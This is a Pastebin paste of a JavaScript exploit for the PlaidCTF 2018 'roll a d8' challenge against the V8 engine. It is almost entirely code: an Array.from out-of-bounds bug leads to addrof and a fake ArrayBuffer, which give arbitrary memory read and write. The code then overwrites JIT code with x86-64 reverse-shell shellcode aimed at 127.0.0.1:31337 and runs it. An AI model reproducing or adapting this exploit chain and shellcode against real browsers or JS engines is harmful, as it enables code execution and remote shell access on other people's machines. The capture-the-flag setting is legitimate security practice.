Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // PlaidCTF 2018 - Pwnable - roll a d8 - 350 pts
- function Memory() {
- let oobArray = [1.1];
- let packed = [0, {}];
- let maxSize = 1028 * 8;
- function d2u(v) {
- f64 = new Float64Array(1);
- f64[0] = v;
- d = new Uint32Array(f64.buffer);
- return d;
- }
- function u2d(lo, hi) {
- u32 = new Uint32Array(2);
- u32[0] = lo;
- u32[1] = hi;
- f = new Float64Array(u32.buffer);
- return f[0];
- }
- Array.from.call(function() { return oobArray }, {[Symbol.iterator] : _ => (
- {
- counter : 0,
- next() {
- let result = this.counter++;
- if (this.counter > maxSize) {
- oobArray.length = 0;
- return {done: true};
- } else {
- return {value: result, done: false};
- }
- }
- }
- ) });
- Array.from.call(function() { return packed }, {[Symbol.iterator] : _ => (
- {
- counter : 0,
- next() {
- let result = this.counter++;
- if (this.counter > maxSize) {
- packed.length = 0;
- return {done: true};
- } else {
- return {value: result, done: false};
- }
- }
- }
- ) });
- // At this point {oobArray, packed} JS Elements point to the same addr and used while using arrays.
- // From here we can leak obj addr
- var ab = new ArrayBuffer(0x100);
- function _addrof(obj) {
- packed[1] = obj;
- l = d2u(oobArray[1]);
- l[0] -= 0x1;
- return l;
- }
- // leak ArrayBuffer prototype to fake an ArrayBuffer
- ab_p = _addrof(ab.__proto__);
- ab_p_lo = ab_p[0];
- ab_p_hi = ab_p[1];
- // faking ArrayBuffer
- var fake_ab = [ 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1];
- fake_ab[0] = u2d(0x0, 0x0);
- fake_ab[1] = u2d(0x110a0a0a, 0x0d000423);
- fake_ab[2] = u2d(0x082003ff, 0x0);
- fake_ab[3] = u2d(ab_p_lo, ab_p_hi);
- fake_ab[4] = u2d(ab_p_lo - 0x1a0, ab_p_hi);
- fake_ab[5] = u2d(0x0, 0x0);
- fake_ab[6] = u2d(0x0, 0x0);
- fake_ab[7] = u2d(0x0, 0x0);
- fake_ab[8] = u2d(0x0, 0x0);
- fake_ab[9] = u2d(0x0, 0x1000);
- fake_ab[10] = u2d(0x12345678, 0x0);
- fake_ab[11] = u2d(0x12345678, 0x0);
- fake_ab[12] = u2d(0x100, 0x0);
- fake_ab[13] = u2d(0x4, 0x0);
- fake_ab[14] = u2d(0x0, 0x0);
- //%DebugPrint(fake_ab);
- fabv = _addrof(fake_ab);
- fabv_lo = fabv[0];
- fabv_hi = fabv[1];
- fake_ab[6] = u2d(fabv_lo + 0x40 + 0x1, fabv_hi);
- fake_ab[7] = u2d(fabv_lo + 0x40 + 0x1, fabv_hi);
- fake_ab[8] = u2d(fabv_lo + 0x40 + 0x1, fabv_hi);
- oobArray[1] = u2d(0x40+6*8+fabv_lo+0x1, fabv_hi);
- fab = packed[1];
- //%DebugPrint(fab);
- var dv = new DataView(fab);
- //%DebugPrint(dv);
- function set_addr(addr) {
- fake_ab[10] = u2d(addr[0], addr[1]);
- fake_ab[11] = u2d(addr[0], addr[1]);
- }
- return {
- read32(addr) {
- set_addr(addr);
- return dv.getUint32(0, true);
- },
- write32(addr, value) {
- set_addr(addr);
- dv.setUint32(0, value, true);
- },
- write(addr, arr) { // Uint8 arr
- set_addr(addr);
- for (var i=0; i<arr.length; i++)
- dv.setUint8(i, arr[i]);
- },
- addrof(obj) {
- return _addrof(obj); // returns [low, high]
- }
- }
- }
- var mem = Memory();
- var func = Array.prototype.map;
- func_addr = mem.addrof(func);
- func_addr[0] += 6*8;
- jit_lo = mem.read32(func_addr) - 0x1 + 0x60;
- console.log("jit_lo @ 0x" + jit_lo.toString(16));
- func_addr[0] += 0x4;
- jit_hi = mem.read32(func_addr);
- console.log("jit_hi @ 0x" + jit_hi.toString(16));
- jit_addr = [jit_lo, jit_hi];
- // TCP REVERSE SHELL -> 127.0.0.1:31337
- sh = [0x48, 0x31, 0xc0, 0x48, 0x31, 0xff, 0x48, 0x31, 0xf6, 0x48, 0x31, 0xd2, 0x4d, 0x31, 0xc0, 0x6a, 0x02, 0x5f, 0x6a, 0x01, 0x5e, 0x6a, 0x06, 0x5a, 0x6a, 0x29, 0x58, 0x0f, 0x05, 0x49, 0x89, 0xc0, 0x48, 0x31, 0xf6, 0x4d, 0x31, 0xd2, 0x41, 0x52, 0xc6, 0x04, 0x24, 0x02, 0x66, 0xc7, 0x44, 0x24, 0x02, 0x7a, 0x69, 0xc7, 0x44, 0x24, 0x04, 0x7f, 0x0, 0x0, 0x01, 0x48, 0x89, 0xe6, 0x6a, 0x10, 0x5a, 0x41, 0x50, 0x5f, 0x6a, 0x2a, 0x58, 0x0f, 0x05, 0x48, 0x31, 0xf6, 0x6a, 0x03, 0x5e, 0x48, 0xff, 0xce, 0x6a, 0x21, 0x58, 0x0f, 0x05, 0x75, 0xf6, 0x48, 0x31, 0xff, 0x57, 0x57, 0x5e, 0x5a, 0x48, 0xbf, 0x2f, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x48, 0xc1, 0xef, 0x08, 0x57, 0x54, 0x5f, 0x6a, 0x3b, 0x58, 0x0f, 0x05];
- mem.write(jit_addr, sh);
- console.log("Running shellcode...")
- func();
- while(true) {
- ;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement